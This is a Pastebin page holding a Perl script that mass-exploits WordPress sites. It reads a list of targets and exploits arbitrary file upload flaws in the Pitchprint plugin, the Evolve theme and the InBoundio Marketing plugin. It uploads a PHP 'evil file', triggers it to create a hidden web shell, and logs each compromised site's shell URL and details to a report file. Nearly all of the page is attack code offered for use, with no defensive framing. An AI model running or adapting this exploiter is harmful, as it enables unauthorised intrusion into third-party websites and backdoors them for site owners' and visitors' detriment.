API tools faq
paste
Advertisement
Jemb0t_IR3eng

Pirtchprint & Evolve & Inboundio File Upload

Jemb0t_IR3eng
Apr 17th, 2019
756
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.79 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/perl -w
  2. # C0ded by Mr_AnarShi-T (M-A)
  3. # (c) Zero-Way.NeY & Janissaries.org & Sec4ever.com
  4. # GreeT's : All Friend Specially Rab3oun :)
  5. use strict;
  6. use LWP::UserAgent;
  7. ##
  8. my @linkz;
  9. my $datestring = localtime();
  10. my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime();
  11. sub randomagent {
  12. my @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
  13. 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',
  14. 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
  15. 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',
  16. 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',
  17. 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'
  18. );
  19. my $random = $array[rand @array];
  20. return($random);
  21. }
  22.  
  23. my $useragent = randomagent();#Get a Random User Agent
  24. my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });#Https websites accept
  25. $ua->cookie_jar({});# Cookies
  26. $ua->timeout(10);#Time out = 10 you can change it
  27. $ua->agent($useragent);#agent type
  28. flag();
  29. print "\n[+] Enter List Of Target : ";
  30. chomp (my $list=<>);
  31. my $file= "make.php";# Evil File
  32. print "[+] Started : $datestring\n";
  33. print "[+] Evil File : $file\n";
  34. print "\n[.] Starting...\n";
  35. GetLinkz();
  36. print "[+] Quantity of Links:".scalar(@linkz)."\n";
  37. print "[.] Begin work...\n";
  38. Fuck();
  39.  
  40. sub flag {print "\n[+] Wordpress File Upload Exploiter \n[*] Coder => M-A\n\n";
  41. }
  42.  
  43. sub Fuck {
  44.  
  45. foreach my $web( @linkz ) {
  46. Exploiting ($web);
  47. }
  48. }
  49.  
  50. sub Exploiting {
  51. my $link = $_[0];
  52. print "\n[Test] ".$link."\n\n";
  53. pitchprint($link);
  54. evolve ($link);
  55. inboundio ($link);
  56. }
  57.  
  58. sub GetLinkz {
  59. open( DOM, $list ) or die "$!\n";
  60. while( defined( my $line_ = <DOM> ) ) {
  61. chomp( $line_ );
  62. push( @linkz, $line_ );
  63. }
  64. close( DOM );
  65. }
  66.  
  67. sub pitchprint {
  68. print "[Exploit] Pitchprint Plugin File Upload\n";
  69. my $url = "http://".$_[0]."/wp-content/plugins/pitchprint/uploader/";
  70. my $ss = "http://".$_[0]."/wp-content/plugins/pitchprint/uploader/files/".$file;
  71. my $response = $ua->get($url);
  72. if ($response->content=~/DELETE/ || $response->content=~/files/){
  73. print "[OK] Exploit Exists\n";
  74. print "[*] Sent payload\n";
  75. my $regex = 'files';
  76. my $body = $ua->post( $url,
  77. Content_Type => 'form-data',
  78. Content => [ 'files[]' => ["$file"] ]
  79. );
  80. if ($body->content!~/Filetype not allowed/){
  81. print "[+] Payload successfully executed\n";
  82. print "[*] Checking if shell was uploaded\n";
  83. my $res = $ua->get($ss);
  84. if ($res->is_success){
  85. my $y = $ss."?cmd=up";
  86. my $de = $ua->get($y);
  87. if ($de->content=~/OK/) {
  88. print "[OK] Shell successfully Created \n";
  89. my $hh = "http://".$_[0]."/wp-content/plugins/pitchprint/uploader/files/.up.php";
  90. my $ee = $ua->get($hh);
  91. print "\n[*] Website Info :\n";
  92. print "| ".$hh."\n";
  93. save ($hh);
  94. if ($ee->content=~/<\/title><b><br><br>(.*?)<br><\/b>/) {
  95. print "| $1 \n";
  96. save ($1);
  97. if ($ee->content=~/<br><\/b><b><br><br>(.*?)<br><br><\/b><form action=/) {
  98. print "| $1\n\n";
  99. save ($1);
  100. }
  101. }
  102. }
  103. }
  104. else {print "[No] Can't Creat Shell \n\n";}
  105. }
  106. else {print "[No] Can't Send Payload \n\n";}
  107. }
  108. else {print "[No] Exploit Not Found \n\n";}
  109. }
  110.  
  111. sub evolve {
  112. print "[Exploit] Evolve Theme File Upload\n";
  113. my $url = "http://".$_[0]."/wp-content/themes/evolve/js/back-end/libraries/fileuploader/upload_handler.php";
  114. my $ss = "http://".$_[0]."/wp-content/uploads/$mon/$year/".$file;
  115. my $response = $ua->get($url);
  116. if ($response->content=~/No files were uploaded/ || $response->content=~/error/){
  117. print "[OK] Exploit Exists\n";
  118. print "[*] Sent payload\n";
  119. my $regex = 'success';
  120. my $body = $ua->post( $url,
  121. Content_Type => 'form-data',
  122. Content => [ 'qqfile' => ["$file"] ]
  123. );
  124. if ($body->content=~ /$regex/){
  125. print "[+] Payload successfully executed\n";
  126. print "[*] Checking if shell was uploaded\n\n";
  127. my $res = $ua->get($ss);
  128. if ($res->is_success){
  129. my $y = $ss."?cmd=up";
  130. my $de = $ua->get($y);
  131. if ($de->content=~/OK/) {
  132. print "[OK] Shell successfully Created \n";
  133. my $hh = "http://".$_[0]."/wp-content/uploads/$mon/$year/.up.php";
  134. my $ee = $ua->get($hh);
  135. print "\n[*] Website Info :\n";
  136. print "| ".$hh."\n";
  137. save ($hh);
  138. if ($ee->content=~/<\/title><b><br><br>(.*?)<br><\/b>/) {
  139. print "| $1 \n";
  140. save ($1);
  141. if ($ee->content=~/<br><\/b><b><br><br>(.*?)<br><br><\/b><form action=/) {
  142. print "| $1\n\n";
  143. save ($1);
  144. }
  145. }
  146. }
  147. }
  148. else {print "[No] Can't Creat Shell \n\n";}
  149. }
  150. else {print "[No] Can't Send Payload\n\n";}
  151. }
  152. else {print "[No] Exploit Not Found\n\n";}
  153. }
  154.  
  155. sub inboundio {
  156. print "[Exploit] WordPress Plugin InBoundio Marketing 1.0 File Upload\n";
  157. my $url = "http://".$_[0]."/wp-content/plugins/inboundio-marketing/admin/partials/csv_uploader.php";
  158. my $ss = "http://".$_[0]."/wp-content/plugins/inboundio-marketing/admin/partials/uploaded_csv/".$file;
  159. my $response = $ua->get($url);
  160. my $lengh = length($response->content);
  161. if ($lengh eq 0 || $response->is_success){
  162. print "[OK] Exploit Exists\n";
  163. print "[*] Sent payload\n";
  164. my $body = $ua->post( $url,
  165. Content_Type => 'form-data',
  166. Content => [ 'file' => ["$file"] ]
  167. );
  168. if ($body->content=~ /$_[0]/){
  169. print "[+] Payload successfully executed\n";
  170. print "[*] Checking if shell was uploaded\n\n";
  171. my $res = $ua->get($ss);
  172. if ($res->is_success){
  173. my $y = $ss."?cmd=up";
  174. my $de = $ua->get($y);
  175. if ($de->content=~/OK/) {
  176. print "[OK] Shell successfully Created \n";
  177. my $hh = "http://".$_[0]."/wp-content/plugins/inboundio-marketing/admin/partials/uploaded_csv/.up.php";
  178. my $ee = $ua->get($hh);
  179. print "\n[*] Website Info :\n";
  180. print "| ".$hh."\n";
  181. save ($hh);
  182. if ($ee->content=~/<\/title><b><br><br>(.*?)<br><\/b>/) {
  183. print "| $1 \n";
  184. save ($1);
  185. if ($ee->content=~/<br><\/b><b><br><br>(.*?)<br><br><\/b><form action=/) {
  186. print "| $1\n\n";
  187. save ($1);
  188. }
  189. }
  190. }
  191. }
  192. else {print "[No] Can't Creat Shell \n\n";}
  193. }
  194. else {print "[No] Can't Send Payload \n\n";}
  195. }
  196. else {print "[No] Exploit Not Found \n\n";}
  197. }
  198.  
  199. sub save {
  200. open (XX,">>",'report.txt');
  201. print XX $_[0]."\n";
  202. close XX;
  203. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!